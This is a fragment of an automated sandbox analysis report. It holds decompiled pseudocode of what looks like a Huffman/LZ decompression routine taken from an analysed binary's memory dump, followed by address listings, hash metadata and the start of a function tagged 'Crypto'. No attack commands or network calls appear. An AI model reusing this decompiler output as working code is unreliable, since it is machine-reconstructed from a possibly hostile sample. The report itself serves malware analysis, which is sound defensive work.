				signed int _t458;
				unsigned int _t459;
				signed int _t461;
				signed int _t462;
				void* _t463;
				signed int _t464;
				signed int* _t465;
				signed char _t466;
				signed int* _t468;
				signed int* _t470;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				void* _t479;

				_t466 =  *(_t479 + 0x44);
				 *(_t479 + 0x30) = __ecx;
				_t321 = _t466 + 0x18;
				_t465 = _t466 + 4;
				if( *((char*)(_t466 + 0x2c)) != 0) {
					L2:
					_t344 =  *_t321;
					_t220 =  *((intOrPtr*)(_t466 + 0x24)) + _t344;
					if( *_t465 <= _t220) {
						 *(_t466 + 0x4ad8) =  *(_t466 + 0x4ad8) & 0x00000000;
						_t223 =  *((intOrPtr*)(_t466 + 0x20)) - 1 + _t344;
						_t436 =  *((intOrPtr*)(_t466 + 0x4acc)) - 0x10;
						 *(_t479 + 0x1c) = _t223;
						 *(_t479 + 0x18) = _t436;
						__eflags = _t223 - _t436;
						if(_t223 >= _t436) {
							_t468 = _t436;
							 *(_t479 + 0x14) = _t436;
						} else {
							_t468 = _t223;
							 *(_t479 + 0x14) = _t468;
						}
						_t322 = _t466 + 0x4ad4;
						while(1) {
							_t345 =  *_t465;
							 *(_t479 + 0x10) = _t322;
							__eflags = _t345 - _t468;
							if(_t345 < _t468) {
								goto L15;
							}
							__eflags = _t345 - _t223;
							if(__eflags > 0) {
								L93:
								return _t223;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t345 - _t436;
								if(_t345 < _t436) {
									L14:
									_t223 = _t466 + 0x4ad4;
									_t322 = _t223;
									 *(_t479 + 0x10) = _t223;
									__eflags = _t345 -  *((intOrPtr*)(_t466 + 0x4acc));
									if(_t345 >=  *((intOrPtr*)(_t466 + 0x4acc))) {
										L92:
										 *((char*)(_t466 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t466 + 0x4ad2));
								if( *((char*)(_t466 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t223 =  *(_t466 + 8);
							__eflags = _t223 -  *((intOrPtr*)(_t466 + 0x1c));
							if(_t223 >=  *((intOrPtr*)(_t466 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t346 =  *(_t466 + 0x4adc);
							__eflags =  *(_t466 + 0x4ad8) - _t346 - 8;
							if( *(_t466 + 0x4ad8) > _t346 - 8) {
								_t316 = _t346 + _t346;
								 *(_t466 + 0x4adc) = _t316;
								_push(_t316 * 0xc);
								_push( *_t322);
								_t477 = E00CE3E3E(_t346, _t436);
								__eflags = _t477;
								if(_t477 == 0) {
									E00CC6CA7(0xd01098);
								}
								 *_t322 = _t477;
							}
							_t225 =  *(_t466 + 0x4ad8);
							_t470 = _t225 * 0xc +  *_t322;
							 *(_t479 + 0x2c) = _t470;
							 *(_t466 + 0x4ad8) = _t225 + 1;
							_t227 = E00CCA89D(_t465);
							_t228 =  *(_t466 + 0xb4);
							_t438 = _t227 & 0x0000fffe;
							__eflags = _t438 -  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4));
							if(_t438 >=  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4))) {
								_t348 = 0xf;
								_t229 = _t228 + 1;
								 *(_t479 + 0x28) = _t348;
								__eflags = _t229 - _t348;
								if(_t229 >= _t348) {
									L27:
									_t324 = _t465[1] + _t348;
									_t325 = _t324 & 0x00000007;
									 *_t465 =  *_t465 + (_t324 >> 3);
									 *(_t479 + 0x18) =  *_t465;
									_t233 =  *(_t479 + 0x28);
									_t465[1] = _t325;
									_t349 = 0x10;
									_t352 =  *((intOrPtr*)(_t466 + 0x74 + _t233 * 4)) + (_t438 -  *((intOrPtr*)(_t466 + 0x30 + _t233 * 4)) >> _t349 - _t233);
									__eflags = _t352 -  *((intOrPtr*)(_t466 + 0x30));
									asm("sbb eax, eax");
									_t234 = _t233 & _t352;
									__eflags = _t234;
									_t235 =  *(_t466 + 0xcb8 + _t234 * 2) & 0x0000ffff;
									goto L28;
								}
								_t429 = _t466 + 0x34 + _t229 * 4;
								while(1) {
									__eflags = _t438 -  *_t429;
									if(_t438 <  *_t429) {
										break;
									}
									_t229 = _t229 + 1;
									_t429 = _t429 + 4;
									__eflags = _t229 - 0xf;
									if(_t229 < 0xf) {
										continue;
									}
									_t348 =  *(_t479 + 0x28);
									goto L27;
								}
								_t348 = _t229;
								 *(_t479 + 0x28) = _t229;
								goto L27;
							} else {
								_t430 = 0x10;
								_t464 = _t438 >> _t430 - _t228;
								_t342 = ( *(_t464 + _t466 + 0xb8) & 0x000000ff) + _t465[1];
								 *_t465 =  *_t465 + (_t342 >> 3);
								_t325 = _t342 & 0x00000007;
								 *(_t479 + 0x18) =  *_t465;
								_t465[1] = _t325;
								_t235 =  *(_t466 + 0x4b8 + _t464 * 2) & 0x0000ffff;
								L28:
								_t353 = _t235 & 0x0000ffff;
								__eflags = _t353 - 0x100;
								if(_t353 >= 0x100) {
									__eflags = _t353 - 0x106;
									if(_t353 < 0x106) {
										__eflags = _t353 - 0x100;
										if(_t353 != 0x100) {
											__eflags = _t353 - 0x101;
											if(_t353 != 0x101) {
												_t237 = 3;
												 *_t470 = _t237;
												_t470[2] = _t353 - 0x102;
												_t239 = E00CCA89D(_t465);
												_t240 =  *(_t466 + 0x2d78);
												_t442 = _t239 & 0x0000fffe;
												__eflags = _t442 -  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4));
												if(_t442 >=  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4))) {
													_t326 = 0xf;
													_t241 = _t240 + 1;
													__eflags = _t241 - _t326;
													if(_t241 >= _t326) {
														L86:
														_t356 = _t465[1] + _t326;
														_t357 = _t356 & 0x00000007;
														_t465[1] = _t357;
														_t243 = _t356 >> 3;
														 *_t465 =  *_t465 + _t243;
														 *(_t479 + 0x30) = _t357;
														_t358 = 0x10;
														_t361 =  *((intOrPtr*)(_t466 + 0x2d38 + _t326 * 4)) + (_t442 -  *((intOrPtr*)(_t466 + 0x2cf4 + _t326 * 4)) >> _t358 - _t326);
														__eflags = _t361 -  *((intOrPtr*)(_t466 + 0x2cf4));
														asm("sbb eax, eax");
														_t244 = _t243 & _t361;
														__eflags = _t244;
														_t245 =  *(_t466 + 0x397c + _t244 * 2) & 0x0000ffff;
														L87:
														_t246 = _t245 & 0x0000ffff;
														__eflags = _t246 - 8;
														if(_t246 >= 8) {
															_t362 = 3;
															_t329 = (_t246 >> 2) - 1;
															_t445 = ((_t246 & _t362 | 0x00000004) << _t329) + 2;
															 *(_t479 + 0x2c) = _t445;
															__eflags = _t329;
															if(_t329 != 0) {
																_t250 = E00CCA89D(_t465);
																_t365 = 0x10;
																_t445 =  *(_t479 + 0x2c) + (_t250 >> _t365 - _t329);
																_t368 =  *(_t479 + 0x30) + _t329;
																 *_t465 =  *_t465 + (_t368 >> 3);
																_t369 = _t368 & 0x00000007;
																__eflags = _t369;
																_t465[1] = _t369;
															}
														} else {
															_t445 = _t246 + 2;
														}
														_t470[1] = _t445;
														L33:
														_t322 =  *(_t479 + 0x10);
														L34:
														_t436 =  *(_t479 + 0x1c);
														_t223 =  *(_t479 + 0x20);
														_t468 =  *(_t479 + 0x14);
														continue;
													}
													_t371 = _t466 + 0x2cf8 + _t241 * 4;
													while(1) {
														__eflags = _t442 -  *_t371;
														if(_t442 <  *_t371) {
															break;
														}
														_t241 = _t241 + 1;
														_t371 = _t371 + 4;
														__eflags = _t241 - 0xf;
														if(_t241 < 0xf) {
															continue;
														}
														goto L86;
													}
													_t326 = _t241;
													goto L86;
												}
												_t372 = 0x10;
												_t447 = _t442 >> _t372 - _t240;
												_t331 = ( *(_t447 + _t466 + 0x2d7c) & 0x000000ff) + _t465[1];
												 *_t465 =  *_t465 + (_t331 >> 3);
												_t332 = _t331 & 0x00000007;
												_t465[1] = _t332;
												_t245 =  *(_t466 + 0x317c + _t447 * 2) & 0x0000ffff;
												 *(_t479 + 0x30) = _t332;
												goto L87;
											}
											 *_t470 = 2;
											goto L33;
										}
										_push(_t479 + 0x38);
										E00CD3F9D( *((intOrPtr*)(_t479 + 0x34)), _t465);
										_t322 =  *(_t479 + 0x10);
										_t470[1] =  *(_t479 + 0x38) & 0x000000ff;
										_t470[2] =  *(_t479 + 0x3c);
										_t448 = 4;
										 *_t470 = _t448;
										_t260 =  *(_t466 + 0x4ad8);
										_t376 = _t260 * 0xc +  *_t322;
										 *(_t466 + 0x4ad8) = _t260 + 1;
										_t376[1] =  *(_t479 + 0x44) & 0x000000ff;
										 *_t376 = _t448;
										_t376[2] =  *(_t479 + 0x40);
										goto L34;
									}
									_t264 = _t353 - 0x106;
									__eflags = _t264 - 8;
									if(_t264 >= 8) {
										_t449 = 3;
										_t379 = (_t264 >> 2) - 1;
										 *(_t479 + 0x30) = _t379;
										 *(_t479 + 0x24) = ((_t264 & _t449 | 0x00000004) << _t379) + 2;
										__eflags = _t379;
										if(_t379 != 0) {
											_t305 = E00CCA89D(_t465);
											_t340 = _t325 +  *(_t479 + 0x30);
											_t422 = 0x10;
											 *(_t479 + 0x24) =  *(_t479 + 0x24) + (_t305 >> _t422 -  *(_t479 + 0x30));
											_t425 =  *(_t479 + 0x18) + (_t340 >> 3);
											_t325 = _t340 & 0x00000007;
											__eflags = _t325;
											 *(_t479 + 0x18) = _t425;
											 *_t465 = _t425;
											_t465[1] = _t325;
										}
									} else {
										 *(_t479 + 0x24) = _t264 + 2;
									}
									_t269 = E00CCA89D(_t465);
									_t270 =  *(_t466 + 0xfa0);
									_t451 = _t269 & 0x0000fffe;
									__eflags = _t451 -  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4));
									if(_t451 >=  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4))) {
										_t333 = 0xf;
										_t271 = _t270 + 1;
										__eflags = _t271 - _t333;
										if(_t271 >= _t333) {
											L49:
											_t382 = _t465[1] + _t333;
											_t383 = _t382 & 0x00000007;
											_t465[1] = _t383;
											 *_t465 =  *_t465 + (_t382 >> 3);
											_t274 =  *_t465;
											 *(_t479 + 0x18) = _t383;
											_t384 = 0x10;
											 *(_t479 + 0x28) = _t274;
											_t387 =  *((intOrPtr*)(_t466 + 0xf60 + _t333 * 4)) + (_t451 -  *((intOrPtr*)(_t466 + 0xf1c + _t333 * 4)) >> _t384 - _t333);
											__eflags = _t387 -  *((intOrPtr*)(_t466 + 0xf1c));
											asm("sbb eax, eax");
											_t275 = _t274 & _t387;
											__eflags = _t275;
											_t276 =  *(_t466 + 0x1ba4 + _t275 * 2) & 0x0000ffff;
											goto L50;
										}
										_t418 = _t466 + 0xf20 + _t271 * 4;
										while(1) {
											__eflags = _t451 -  *_t418;
											if(_t451 <  *_t418) {
												break;
											}
											_t271 = _t271 + 1;
											_t418 = _t418 + 4;
											__eflags = _t271 - 0xf;
											if(_t271 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t333 = _t271;
										goto L49;
									} else {
										_t419 = 0x10;
										_t459 = _t451 >> _t419 - _t270;
										 *(_t479 + 0x30) = _t459;
										_t461 = ( *(_t459 + _t466 + 0xfa4) & 0x000000ff) + _t325;
										_t303 = (_t461 >> 3) +  *(_t479 + 0x18);
										_t462 = _t461 & 0x00000007;
										 *(_t479 + 0x28) = _t303;
										 *_t465 = _t303;
										_t465[1] = _t462;
										 *(_t479 + 0x18) = _t462;
										_t276 =  *(_t466 + 0x13a4 +  *(_t479 + 0x30) * 2) & 0x0000ffff;
										L50:
										_t277 = _t276 & 0x0000ffff;
										__eflags = _t277 - 4;
										if(_t277 >= 4) {
											_t473 = (_t277 >> 1) - 1;
											_t281 = ((_t277 & 0x00000001 | 0x00000002) << _t473) + 1;
											 *(_t479 + 0x30) = _t281;
											_t334 = _t281;
											__eflags = _t473;
											if(_t473 == 0) {
												L68:
												_t470 =  *(_t479 + 0x2c);
												L69:
												_t282 =  *(_t479 + 0x24);
												__eflags = _t334 - 0x100;
												if(_t334 > 0x100) {
													_t282 = _t282 + 1;
													__eflags = _t334 - 0x2000;
													if(_t334 > 0x2000) {
														_t282 = _t282 + 1;
														__eflags = _t334 - 0x40000;
														if(_t334 > 0x40000) {
															_t282 = _t282 + 1;
															__eflags = _t282;
														}
													}
												}
												 *_t470 = 1;
												_t470[1] = _t282;
												_t470[2] = _t334;
												goto L33;
											}
											__eflags = _t473 - 4;
											if(__eflags < 0) {
												_t283 = E00CD8934(_t465);
												_t390 = 0x20;
												_t334 = (_t283 >> _t390 - _t473) +  *(_t479 + 0x30);
												_t393 =  *(_t479 + 0x18) + _t473;
												_t394 = _t393 & 0x00000007;
												__eflags = _t394;
												 *_t465 = (_t393 >> 3) +  *(_t479 + 0x28);
												_t465[1] = _t394;
												goto L68;
											}
											if(__eflags <= 0) {
												_t474 =  *(_t479 + 0x28);
											} else {
												_t298 = E00CD8934(_t465);
												_t411 = 0x24;
												_t334 = (_t298 >> _t411 - _t473 << 4) +  *(_t479 + 0x30);
												_t415 =  *(_t479 + 0x18) + 0xfffffffc + _t473;
												_t474 =  *(_t479 + 0x28) + (_t415 >> 3);
												_t416 = _t415 & 0x00000007;
												 *_t465 = _t474;
												 *(_t479 + 0x18) = _t416;
												_t465[1] = _t416;
											}
											_t287 = E00CCA89D(_t465);
											_t288 =  *(_t466 + 0x1e8c);
											_t455 = _t287 & 0x0000fffe;
											__eflags = _t455 -  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4));
											if(_t455 >=  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4))) {
												_t475 = 0xf;
												_t289 = _t288 + 1;
												__eflags = _t289 - _t475;
												if(_t289 >= _t475) {
													L65:
													_t397 = _t465[1] + _t475;
													_t465[1] = _t397 & 0x00000007;
													_t291 = _t397 >> 3;
													 *_t465 =  *_t465 + _t291;
													_t399 = 0x10;
													_t402 =  *((intOrPtr*)(_t466 + 0x1e4c + _t475 * 4)) + (_t455 -  *((intOrPtr*)(_t466 + 0x1e08 + _t475 * 4)) >> _t399 - _t475);
													__eflags = _t402 -  *((intOrPtr*)(_t466 + 0x1e08));
													asm("sbb eax, eax");
													_t292 = _t291 & _t402;
													__eflags = _t292;
													_t293 =  *(_t466 + 0x2a90 + _t292 * 2) & 0x0000ffff;
													goto L66;
												}
												_t404 = _t466 + 0x1e0c + _t289 * 4;
												while(1) {
													__eflags = _t455 -  *_t404;
													if(_t455 <  *_t404) {
														break;
													}
													_t289 = _t289 + 1;
													_t404 = _t404 + 4;
													__eflags = _t289 - 0xf;
													if(_t289 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t475 = _t289;
												goto L65;
											} else {
												_t405 = 0x10;
												_t458 = _t455 >> _t405 - _t288;
												_t408 = ( *(_t458 + _t466 + 0x1e90) & 0x000000ff) +  *(_t479 + 0x18);
												 *_t465 = (_t408 >> 3) + _t474;
												_t465[1] = _t408 & 0x00000007;
												_t293 =  *(_t466 + 0x2290 + _t458 * 2) & 0x0000ffff;
												L66:
												_t334 = _t334 + (_t293 & 0x0000ffff);
												goto L68;
											}
										}
										_t334 = _t277 + 1;
										goto L69;
									}
								}
								__eflags =  *(_t466 + 0x4ad8) - 1;
								if( *(_t466 + 0x4ad8) <= 1) {
									L35:
									 *_t470 =  *_t470 & 0x00000000;
									_t470[2] = _t353;
									_t470[1] = 0;
									goto L33;
								}
								__eflags =  *(_t470 - 0xc);
								if( *(_t470 - 0xc) != 0) {
									goto L35;
								}
								_t310 =  *(_t470 - 8) & 0x0000ffff;
								_t463 = 3;
								__eflags = _t310 - _t463;
								if(_t310 >= _t463) {
									goto L35;
								}
								_t311 = _t310 + 1;
								 *(_t470 - 8) = _t311;
								 *((_t311 & 0x0000ffff) + _t470 - 4) = _t353;
								_t72 = _t466 + 0x4ad8;
								 *_t72 =  *(_t466 + 0x4ad8) - 1;
								__eflags =  *_t72;
								goto L33;
							}
						}
					}
					L3:
					 *((char*)(_t466 + 0x4ad0)) = 1;
					return _t220;
				}
				 *((char*)(_t466 + 0x2c)) = 1;
				_push(_t466 + 0x30);
				_push(_t321);
				_push(_t465);
				_t220 = E00CD43BF(__ecx);
				if(_t220 == 0) {
					goto L3;
				}
				goto L2;
			}



























































































































                                                    0x00cd7158
                                                    0x00cd715d
                                                    0x00cd7165
                                                    0x00cd7168
                                                    0x00cd716b
                                                    0x00cd7180
                                                    0x00cd7183
                                                    0x00cd7185
                                                    0x00cd7189
                                                    0x00cd71a1
                                                    0x00cd71a8
                                                    0x00cd71aa
                                                    0x00cd71ad
                                                    0x00cd71b1
                                                    0x00cd71b6
                                                    0x00cd71b8
                                                    0x00cd71c2
                                                    0x00cd71c4
                                                    0x00cd71ba
                                                    0x00cd71ba
                                                    0x00cd71bc
                                                    0x00cd71bc
                                                    0x00cd71c8
                                                    0x00cd71ce
                                                    0x00cd71ce
                                                    0x00cd71d0
                                                    0x00cd71d4
                                                    0x00cd71d6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd71d8
                                                    0x00cd71da
                                                    0x00cd77b6
                                                    0x00000000
                                                    0x00cd77b6
                                                    0x00cd71e0
                                                    0x00cd71ee
                                                    0x00cd71ee
                                                    0x00cd71f0
                                                    0x00cd71ff
                                                    0x00cd71ff
                                                    0x00cd7205
                                                    0x00cd7207
                                                    0x00cd720b
                                                    0x00cd7211
                                                    0x00cd77af
                                                    0x00cd77af
                                                    0x00000000
                                                    0x00cd77af
                                                    0x00000000
                                                    0x00cd7211
                                                    0x00cd71f2
                                                    0x00cd71f9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd71f9
                                                    0x00cd71e2
                                                    0x00cd71e5
                                                    0x00cd71e8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7217
                                                    0x00cd7217
                                                    0x00cd7220
                                                    0x00cd7226
                                                    0x00cd7228
                                                    0x00cd722b
                                                    0x00cd7234
                                                    0x00cd7235
                                                    0x00cd723c
                                                    0x00cd7240
                                                    0x00cd7242
                                                    0x00cd7249
                                                    0x00cd7249
                                                    0x00cd724e
                                                    0x00cd724e
                                                    0x00cd7250
                                                    0x00cd725b
                                                    0x00cd725e
                                                    0x00cd7262
                                                    0x00cd7268
                                                    0x00cd726f
                                                    0x00cd7275
                                                    0x00cd727b
                                                    0x00cd727f
                                                    0x00cd72b2
                                                    0x00cd72b3
                                                    0x00cd72b4
                                                    0x00cd72b8
                                                    0x00cd72ba
                                                    0x00cd72db
                                                    0x00cd72de
                                                    0x00cd72e2
                                                    0x00cd72e8
                                                    0x00cd72ec
                                                    0x00cd72f0
                                                    0x00cd72f4
                                                    0x00cd72f9
                                                    0x00cd7306
                                                    0x00cd7308
                                                    0x00cd730b
                                                    0x00cd730d
                                                    0x00cd730d
                                                    0x00cd730f
                                                    0x00000000
                                                    0x00cd730f
                                                    0x00cd72bf
                                                    0x00cd72c2
                                                    0x00cd72c2
                                                    0x00cd72c4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd72c6
                                                    0x00cd72c7
                                                    0x00cd72ca
                                                    0x00cd72cd
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd72cf
                                                    0x00000000
                                                    0x00cd72cf
                                                    0x00cd72d5
                                                    0x00cd72d7
                                                    0x00000000
                                                    0x00cd7281
                                                    0x00cd7283
                                                    0x00cd7286
                                                    0x00cd7290
                                                    0x00cd7298
                                                    0x00cd729a
                                                    0x00cd729f
                                                    0x00cd72a3
                                                    0x00cd72a6
                                                    0x00cd7317
                                                    0x00cd7317
                                                    0x00cd731f
                                                    0x00cd7321
                                                    0x00cd7374
                                                    0x00cd737a
                                                    0x00cd7630
                                                    0x00cd7632
                                                    0x00cd7686
                                                    0x00cd768c
                                                    0x00cd769c
                                                    0x00cd769d
                                                    0x00cd76a8
                                                    0x00cd76ab
                                                    0x00cd76b2
                                                    0x00cd76b8
                                                    0x00cd76be
                                                    0x00cd76c5
                                                    0x00cd76f6
                                                    0x00cd76f7
                                                    0x00cd76f8
                                                    0x00cd76fa
                                                    0x00cd7716
                                                    0x00cd7719
                                                    0x00cd771d
                                                    0x00cd7720
                                                    0x00cd7723
                                                    0x00cd7726
                                                    0x00cd772f
                                                    0x00cd7735
                                                    0x00cd7741
                                                    0x00cd7743
                                                    0x00cd7749
                                                    0x00cd774b
                                                    0x00cd774b
                                                    0x00cd774d
                                                    0x00cd7755
                                                    0x00cd7755
                                                    0x00cd7758
                                                    0x00cd775b
                                                    0x00cd7769
                                                    0x00cd776c
                                                    0x00cd7774
                                                    0x00cd7777
                                                    0x00cd777b
                                                    0x00cd777d
                                                    0x00cd7781
                                                    0x00cd778c
                                                    0x00cd7795
                                                    0x00cd7797
                                                    0x00cd779e
                                                    0x00cd77a0
                                                    0x00cd77a0
                                                    0x00cd77a3
                                                    0x00cd77a3
                                                    0x00cd775d
                                                    0x00cd775d
                                                    0x00cd775d
                                                    0x00cd77a6
                                                    0x00cd7350
                                                    0x00cd7350
                                                    0x00cd7354
                                                    0x00cd7354
                                                    0x00cd7358
                                                    0x00cd735c
                                                    0x00000000
                                                    0x00cd735c
                                                    0x00cd7702
                                                    0x00cd7705
                                                    0x00cd7705
                                                    0x00cd7707
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7709
                                                    0x00cd770a
                                                    0x00cd770d
                                                    0x00cd7710
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7712
                                                    0x00cd7714
                                                    0x00000000
                                                    0x00cd7714
                                                    0x00cd76c9
                                                    0x00cd76cc
                                                    0x00cd76d6
                                                    0x00cd76de
                                                    0x00cd76e0
                                                    0x00cd76e3
                                                    0x00cd76e6
                                                    0x00cd76ee
                                                    0x00000000
                                                    0x00cd76ee
                                                    0x00cd768e
                                                    0x00000000
                                                    0x00cd768e
                                                    0x00cd763c
                                                    0x00cd763e
                                                    0x00cd7648
                                                    0x00cd764c
                                                    0x00cd7654
                                                    0x00cd7659
                                                    0x00cd765a
                                                    0x00cd765d
                                                    0x00cd7666
                                                    0x00cd7669
                                                    0x00cd7674
                                                    0x00cd767c
                                                    0x00cd767e
                                                    0x00000000
                                                    0x00cd767e
                                                    0x00cd7380
                                                    0x00cd7386
                                                    0x00cd7389
                                                    0x00cd73a0
                                                    0x00cd73a6
                                                    0x00cd73af
                                                    0x00cd73b3
                                                    0x00cd73b7
                                                    0x00cd73b9
                                                    0x00cd73bd
                                                    0x00cd73c2
                                                    0x00cd73c8
                                                    0x00cd73cf
                                                    0x00cd73dc
                                                    0x00cd73de
                                                    0x00cd73de
                                                    0x00cd73e1
                                                    0x00cd73e5
                                                    0x00cd73e7
                                                    0x00cd73e7
                                                    0x00cd738b
                                                    0x00cd7396
                                                    0x00cd7396
                                                    0x00cd73ec
                                                    0x00cd73f3
                                                    0x00cd73f9
                                                    0x00cd73ff
                                                    0x00cd7406
                                                    0x00cd7446
                                                    0x00cd7447
                                                    0x00cd7448
                                                    0x00cd744a
                                                    0x00cd7466
                                                    0x00cd7469
                                                    0x00cd746d
                                                    0x00cd7470
                                                    0x00cd7476
                                                    0x00cd747f
                                                    0x00cd7481
                                                    0x00cd7487
                                                    0x00cd748a
                                                    0x00cd7497
                                                    0x00cd7499
                                                    0x00cd749f
                                                    0x00cd74a1
                                                    0x00cd74a1
                                                    0x00cd74a3
                                                    0x00000000
                                                    0x00cd74a3
                                                    0x00cd7452
                                                    0x00cd7455
                                                    0x00cd7455
                                                    0x00cd7457
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7459
                                                    0x00cd745a
                                                    0x00cd745d
                                                    0x00cd7460
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7462
                                                    0x00cd7464
                                                    0x00000000
                                                    0x00cd7408
                                                    0x00cd740a
                                                    0x00cd740d
                                                    0x00cd740f
                                                    0x00cd741b
                                                    0x00cd7422
                                                    0x00cd7426
                                                    0x00cd7429
                                                    0x00cd742d
                                                    0x00cd7433
                                                    0x00cd7436
                                                    0x00cd743a
                                                    0x00cd74ab
                                                    0x00cd74ab
                                                    0x00cd74ae
                                                    0x00cd74b1
                                                    0x00cd74c5
                                                    0x00cd74ca
                                                    0x00cd74cb
                                                    0x00cd74cf
                                                    0x00cd74d1
                                                    0x00cd74d3
                                                    0x00cd75fa
                                                    0x00cd75fa
                                                    0x00cd75fe
                                                    0x00cd75fe
                                                    0x00cd7602
                                                    0x00cd7608
                                                    0x00cd760a
                                                    0x00cd760b
                                                    0x00cd7611
                                                    0x00cd7613
                                                    0x00cd7614
                                                    0x00cd761a
                                                    0x00cd761c
                                                    0x00cd761c
                                                    0x00cd761c
                                                    0x00cd761a
                                                    0x00cd7611
                                                    0x00cd761d
                                                    0x00cd7624
                                                    0x00cd7628
                                                    0x00000000
                                                    0x00cd7628
                                                    0x00cd74d9
                                                    0x00cd74dc
                                                    0x00cd75d1
                                                    0x00cd75da
                                                    0x00cd75e3
                                                    0x00cd75e7
                                                    0x00cd75f2
                                                    0x00cd75f2
                                                    0x00cd75f5
                                                    0x00cd75f7
                                                    0x00000000
                                                    0x00cd75f7
                                                    0x00cd74e2
                                                    0x00cd751d
                                                    0x00cd74e4
                                                    0x00cd74e6
                                                    0x00cd74ef
                                                    0x00cd74fe
                                                    0x00cd7502
                                                    0x00cd750d
                                                    0x00cd750f
                                                    0x00cd7512
                                                    0x00cd7514
                                                    0x00cd7518
                                                    0x00cd7518
                                                    0x00cd7523
                                                    0x00cd752a
                                                    0x00cd7530
                                                    0x00cd7536
                                                    0x00cd753d
                                                    0x00cd756d
                                                    0x00cd756e
                                                    0x00cd756f
                                                    0x00cd7571
                                                    0x00cd758d
                                                    0x00cd7590
                                                    0x00cd7597
                                                    0x00cd759a
                                                    0x00cd759d
                                                    0x00cd75a8
                                                    0x00cd75b4
                                                    0x00cd75b6
                                                    0x00cd75bc
                                                    0x00cd75be
                                                    0x00cd75be
                                                    0x00cd75c0
                                                    0x00000000
                                                    0x00cd75c0
                                                    0x00cd7579
                                                    0x00cd757c
                                                    0x00cd757c
                                                    0x00cd757e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7580
                                                    0x00cd7581
                                                    0x00cd7584
                                                    0x00cd7587
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7589
                                                    0x00cd758b
                                                    0x00000000
                                                    0x00cd753f
                                                    0x00cd7541
                                                    0x00cd7544
                                                    0x00cd754e
                                                    0x00cd755c
                                                    0x00cd755e
                                                    0x00cd7561
                                                    0x00cd75c8
                                                    0x00cd75cb
                                                    0x00000000
                                                    0x00cd75cb
                                                    0x00cd753d
                                                    0x00cd74b3
                                                    0x00000000
                                                    0x00cd74b3
                                                    0x00cd7406
                                                    0x00cd7323
                                                    0x00cd732a
                                                    0x00cd7365
                                                    0x00cd7365
                                                    0x00cd736b
                                                    0x00cd736e
                                                    0x00000000
                                                    0x00cd736e
                                                    0x00cd732c
                                                    0x00cd7330
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd7332
                                                    0x00cd7338
                                                    0x00cd7339
                                                    0x00cd733c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd733e
                                                    0x00cd733f
                                                    0x00cd7346
                                                    0x00cd734a
                                                    0x00cd734a
                                                    0x00cd734a
                                                    0x00000000
                                                    0x00cd734a
                                                    0x00cd727f
                                                    0x00cd71ce
                                                    0x00cd718b
                                                    0x00cd718b
                                                    0x00000000
                                                    0x00cd718b
                                                    0x00cd7170
                                                    0x00cd7174
                                                    0x00cd7175
                                                    0x00cd7176
                                                    0x00cd7177
                                                    0x00cd717e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c92a67ae5353e33460d92115885762a57529239f7ca111212b4f30afe15c673
                                                    • Instruction ID: c93040e91ec02349d0b661d2ba54cdc458eb74571675bb9554b60f212df0dc7c
                                                    • Opcode Fuzzy Hash: 7c92a67ae5353e33460d92115885762a57529239f7ca111212b4f30afe15c673
                                                    • Instruction Fuzzy Hash: 3412D3B16087069FC719CF28C490AB9B7E0FF94304F148A2EEA96C7780E334E995DB45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCC426 Relevance: .5, Instructions: 454COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CCC426(signed char** __ecx) {
				void* __edi;
				void* _t188;
				signed int _t189;
				char _t192;
				void* _t197;
				void* _t198;
				signed int _t201;
				signed char _t202;
				void* _t212;
				signed int _t213;
				signed int _t215;
				signed int _t216;
				signed char* _t217;
				void* _t218;
				intOrPtr _t222;
				signed char* _t225;
				signed char _t228;
				void* _t237;
				void* _t238;
				signed int _t239;
				signed int _t242;
				signed char* _t245;
				signed int _t277;
				void* _t278;
				void* _t279;
